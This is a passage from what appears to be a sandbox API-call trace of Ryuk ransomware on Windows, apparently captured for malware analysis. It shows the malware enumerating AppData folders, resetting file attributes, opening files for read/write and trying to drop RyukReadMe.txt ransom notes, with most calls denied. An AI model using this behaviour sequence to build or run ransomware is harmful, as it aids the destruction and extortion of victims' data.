lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0159.890] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.890] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.890] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.890] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.890] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat", dwFileAttributes=0x80) returned 0 [0159.891] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.891] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.891] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.891] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.891] SetLastError (dwErrCode=0x0) [0159.891] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.891] GetLastError () returned 0x5 [0159.891] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0159.891] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.891] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0159.892] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.892] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.892] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.892] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.892] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1]", dwFileAttributes=0x80) returned 0 [0159.892] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1]" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\fwlink[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.892] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.892] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.893] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0159.893] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0159.893] SetLastError (dwErrCode=0x0) [0159.893] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.893] GetLastError () returned 0x5 [0159.893] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0159.893] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.893] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0159.893] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0159.893] SetLastError (dwErrCode=0x0) [0159.893] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.893] GetLastError () returned 0x5 [0159.894] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.894] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.894] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.894] SetLastError (dwErrCode=0x0) [0159.894] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.894] GetLastError () returned 0x5 [0159.894] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.894] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.894] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0159.895] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.895] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.895] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.895] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak", dwFileAttributes=0x80) returned 0 [0159.896] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\internet explorer\\brndlog.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.896] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.896] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.896] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.896] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.896] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt", dwFileAttributes=0x80) returned 0 [0159.896] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\internet explorer\\brndlog.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.897] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.897] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.897] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0159.897] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0159.897] SetLastError (dwErrCode=0x0) [0159.897] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\internet explorer\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.897] GetLastError () returned 0x5 [0159.897] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.897] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.897] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.897] SetLastError (dwErrCode=0x0) [0159.897] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.897] GetLastError () returned 0x5 [0159.897] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.898] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.898] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0159.900] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.900] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.900] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.900] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb", dwFileAttributes=0x80) returned 0 [0159.900] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\currentdatabase_372.wmdb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.900] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.900] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.900] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.900] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.901] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb", dwFileAttributes=0x80) returned 0 [0159.901] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\localmls_3.wmdb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.901] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.902] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.902] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.902] SetLastError (dwErrCode=0x0) [0159.902] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.902] GetLastError () returned 0x5 [0159.902] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0159.902] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.902] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0159.902] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.902] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.902] SetLastError (dwErrCode=0x0) [0159.902] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.903] GetLastError () returned 0x5 [0159.903] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0159.903] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.903] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0159.903] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0159.903] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0159.903] SetLastError (dwErrCode=0x0) [0159.903] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.903] GetLastError () returned 0x5 [0159.903] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0159.903] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.903] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a3000 [0159.905] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0159.905] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0159.905] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.905] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl", dwFileAttributes=0x80) returned 0 [0159.905] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\01_music_auto_rated_at_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.906] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.906] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.906] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0159.906] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.906] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl", dwFileAttributes=0x80) returned 0 [0159.907] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\02_music_added_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.907] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.907] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.907] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0159.908] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.908] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl", dwFileAttributes=0x80) returned 0 [0159.908] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\03_music_rated_at_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.908] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.908] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.908] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0159.908] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.909] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl", dwFileAttributes=0x80) returned 0 [0159.910] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\04_music_played_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.910] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.910] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.910] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0159.910] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.910] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl", dwFileAttributes=0x80) returned 0 [0159.910] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\05_pictures_taken_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.911] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.911] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.911] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0159.911] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.911] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl", dwFileAttributes=0x80) returned 0 [0159.911] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\06_pictures_rated_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.911] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.911] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.911] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0159.911] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.912] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl", dwFileAttributes=0x80) returned 0 [0159.912] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\07_tv_recorded_in_the_last_week.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.912] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.912] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.912] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0159.912] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.913] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl", dwFileAttributes=0x80) returned 0 [0159.913] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\08_video_rated_at_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.913] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.913] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.913] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0159.913] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.913] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl", dwFileAttributes=0x80) returned 0 [0159.917] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\09_music_played_the_most.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.917] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.917] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.917] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0159.917] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.918] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl", dwFileAttributes=0x80) returned 0 [0159.918] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\10_all_music.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.918] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.918] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.918] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 